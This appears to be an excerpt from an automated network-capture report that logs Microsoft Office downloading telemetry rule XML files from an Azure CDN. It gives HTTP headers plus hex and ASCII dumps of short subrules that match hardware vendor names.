                              2024-11-29 14:59:22 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:23 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:23 GMT
                              Content-Type: text/xml
                              Content-Length: 415
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                              ETag: "0x8DC582B988EBD12"
                              x-ms-request-id: f440c5dc-801e-0047-7891-3f7265000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145923Z-174f78459685m244hC1EWRgp2c0000001010000000000mq0
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:23 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                              Session IDSource IPSource PortDestination IPDestination Port
                              46192.168.2.44979513.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:22 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:23 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:23 GMT
                              Content-Type: text/xml
                              Content-Length: 471
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                              ETag: "0x8DC582BB5815C4C"
                              x-ms-request-id: 6c824192-201e-0051-0a91-3f7340000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145923Z-174f7845968zgtf6hC1EWRqd8s0000000sxg00000000fg3q
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:23 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                              Session IDSource IPSource PortDestination IPDestination Port
                              47192.168.2.44979613.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:23 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:23 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:23 GMT
                              Content-Type: text/xml
                              Content-Length: 419
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                              ETag: "0x8DC582BB32BB5CB"
                              x-ms-request-id: c3d74fa2-201e-0003-1d91-3ff85a000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145923Z-174f78459685m244hC1EWRgp2c0000000zug00000000e6up
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:23 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                              Session IDSource IPSource PortDestination IPDestination Port
                              48192.168.2.44979113.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:24 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:25 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:24 GMT
                              Content-Type: text/xml
                              Content-Length: 468
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                              ETag: "0x8DC582B9C8E04C8"
                              x-ms-request-id: dadfc1b6-201e-0096-500b-41ace6000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145924Z-174f7845968n2hr8hC1EWR9cag0000000zug000000001hnz
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:25 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                              Session IDSource IPSource PortDestination IPDestination Port
                              49192.168.2.44979813.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:25 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:25 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:25 GMT
                              Content-Type: text/xml
                              Content-Length: 420
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                              ETag: "0x8DC582B9DAE3EC0"
                              x-ms-request-id: d3507608-601e-003d-4b91-3f6f25000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145925Z-174f78459685m244hC1EWRgp2c0000000zx0000000009vb4
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:25 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                              Session IDSource IPSource PortDestination IPDestination Port
                              50192.168.2.44979913.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:25 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:25 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:25 GMT
                              Content-Type: text/xml
                              Content-Length: 472
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                              ETag: "0x8DC582B9D43097E"
                              x-ms-request-id: dc0e5a4e-901e-005b-0191-3f2005000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145925Z-174f784596886s2bhC1EWR743w000000101000000000e3fr
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:25 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                              Session IDSource IPSource PortDestination IPDestination Port
                              51192.168.2.44980013.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:25 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:26 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:25 GMT
                              Content-Type: text/xml
                              Content-Length: 427
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                              ETag: "0x8DC582BA909FA21"
                              x-ms-request-id: 5810d2d2-301e-0000-6891-3feecc000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145925Z-174f7845968frfdmhC1EWRxxbw000000103g00000000adr4
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:26 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                              Session IDSource IPSource PortDestination IPDestination Port
                              52192.168.2.44979713.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:25 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:32 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:32 GMT
                              Content-Type: text/xml
                              Content-Length: 494
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                              ETag: "0x8DC582BB8972972"
                              x-ms-request-id: baa0830a-001e-0082-4291-3f5880000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145931Z-174f7845968xr5c2hC1EWRd0hn0000000h00000000004938
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:32 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                              Session IDSource IPSource PortDestination IPDestination Port
                              53192.168.2.44980113.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:27 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:27 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:27 GMT
                              Content-Type: text/xml
                              Content-Length: 486
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                              ETag: "0x8DC582B92FCB436"
                              x-ms-request-id: 390b1506-101e-0017-0101-4247c7000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145927Z-174f7845968pf68xhC1EWRr4h800000010c0000000005zge
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:27 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                              Session IDSource IPSource PortDestination IPDestination Port
                              54192.168.2.44980313.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:27 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:27 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:27 GMT
                              Content-Type: text/xml
                              Content-Length: 478
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                              ETag: "0x8DC582B9B233827"
                              x-ms-request-id: 1fa1b817-401e-0067-5691-3f09c2000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145927Z-174f7845968jrjrxhC1EWRmmrs00000010a0000000002x1r
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:27 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                              Session IDSource IPSource PortDestination IPDestination Port
                              55192.168.2.44980213.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:27 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:28 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:27 GMT
                              Content-Type: text/xml
                              Content-Length: 423
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                              ETag: "0x8DC582BB7564CE8"
                              x-ms-request-id: 3eca19a5-d01e-005a-2410-417fd9000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145927Z-174f7845968pght8hC1EWRyvxg000000037g0000000091g8
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:28 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                              Session IDSource IPSource PortDestination IPDestination Port
                              56192.168.2.44980413.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:28 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:28 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:28 GMT
                              Content-Type: text/xml
                              Content-Length: 404
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                              ETag: "0x8DC582B95C61A3C"
                              x-ms-request-id: 5685fe29-701e-0098-4071-40395f000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145928Z-174f7845968cdxdrhC1EWRg0en0000000zxg00000000frta
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
